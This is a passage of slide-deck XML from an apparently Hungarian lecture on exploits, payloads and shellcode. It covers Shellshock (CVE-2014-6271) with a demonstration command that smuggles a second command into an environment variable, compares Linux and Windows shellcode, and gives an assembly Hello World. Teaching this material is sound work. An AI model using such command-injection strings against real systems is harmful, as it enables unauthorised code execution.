            <a:ext cx="721200" cy="5571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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5434525" y="2594050"/>
            <a:ext cx="11877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Payload</a:t>
            </a:r>
            <a:endParaRPr b="1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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7872025" y="943200"/>
            <a:ext cx="10845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Exploit</a:t>
            </a:r>
            <a:endParaRPr b="1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5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CVE-2014-6271 (aka Shell Shock)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="350" name="Google Shape;350;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311708" y="18477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export VAR='() { :; }; /usr/bin/id'; bash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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1136125" y="1813450"/>
            <a:ext cx="6878700" cy="724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A61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2" name="Google Shape;352;p55"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1633225" y="2537750"/>
            <a:ext cx="566700" cy="991500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:srgbClr val="A61C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55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1034675" y="3438800"/>
            <a:ext cx="23031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61C00"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Exploit</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="A61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55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4771675" y="1897375"/>
            <a:ext cx="1962300" cy="537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5" name="Google Shape;355;p55"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="356" idx="0"/>
            <a:endCxn id="354" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5644425" y="2434400"/>
            <a:ext cx="108300" cy="10044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6" name="Google Shape;356;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4492875" y="3438800"/>
            <a:ext cx="23031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Payload</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400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6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 az a shellcode?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="362" name="Google Shape;3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7323" y="1344999"/>
            <a:ext cx="2483876" cy="250310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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1238200"/>
            <a:ext cx="61263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trike="sngStrike"/>
              <a:t>Ol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" strike="sngStrike"/>
              <a:t>yan payload, ami shell-t nyit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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Memóriakorrupciós hibák payloadja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Memóriába injektálható gépi kód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Leggyakoribb cél a távoli hozzáférés/kódfuttatás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Méret és </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>kontroll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> miatt általában Assemblyben írt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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="153600" y="2672100"/>
            <a:ext cx="3904500" cy="20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Linux/UNIX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Direkt kernel hozzaferes (syscall)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syscall statikus verziok kozott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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph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Linux/Unix vs Windows</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="370" name="Google Shape;3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3000" y="963763"/>
            <a:ext cx="2935600" cy="16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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4888550" y="2672100"/>
            <a:ext cx="3904500" cy="19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Nincs kernel-mode access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Interakcio dll-ek segitsegevel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ASLR miatt nincs fix memoriacim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448" y="967725"/>
            <a:ext cx="2214814" cy="1669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466" y="1068100"/>
            <a:ext cx="1416759" cy="16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 txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6938" y="-600"/>
            <a:ext cx="9144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Példa - Hello World</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379" name="Google Shape;379;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311708" y="1238194"/>
            <a:ext cx="8520600" cy="31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global _start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_start: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ecx, msg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msg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edx, len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msg length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bl, 0x1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stdout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mov al, 0x4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; sys_write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	int 0x80 	  </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1"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; start syscall</a:t>
            </a:r>
            <a:endParaRPr i="1"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section .data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msg db 'Helo, world!',0xa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len equ $ - msg</a:t>
            </a:r>
            <a:endParaRPr sz="16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